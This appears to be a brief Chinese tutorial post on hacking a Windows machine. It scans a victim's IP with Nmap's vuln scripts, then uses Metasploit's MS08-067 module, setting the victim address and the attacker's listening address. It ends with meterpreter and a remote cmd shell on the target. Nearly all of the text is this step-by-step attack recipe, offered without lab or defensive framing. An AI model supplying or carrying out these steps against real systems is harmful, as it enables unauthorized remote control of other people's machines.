废话不多说,直接杀入主题,教程需要用到的工具:Namp,Metasploit(两个工具Kali里面都有)
第一步扫描被攻击者主机的漏洞这里我使用Nmap当还有还有更好的
终端输入:nmap 被攻击者IP -script=vuln(扫描常规漏洞)
我们扫描出了一个非常有名且危险的漏洞MS08-067
接下来我们将利用这个漏洞渗透进这台主机
我们打开Metasploit
打开之后呢我们来搜索刚刚那个漏洞
search ms08_067
使用了以后我们输入 show options 来看看需要配置的参数
rhost(被攻击者地址)没有设置我们输入
set rhost 被攻击者IP 来设置这个参数
这一步很重要
加载了以后输入 show options 看看我们还需要添加啥参数
还有一个lhost没有添加这个是攻击者的IP
输入 set lhost 攻击者IP 即可
一切准备完毕输入 exploit 发动攻击
出现meterpreter表示攻击成功
在终端输入shell即可返回一个cmd shell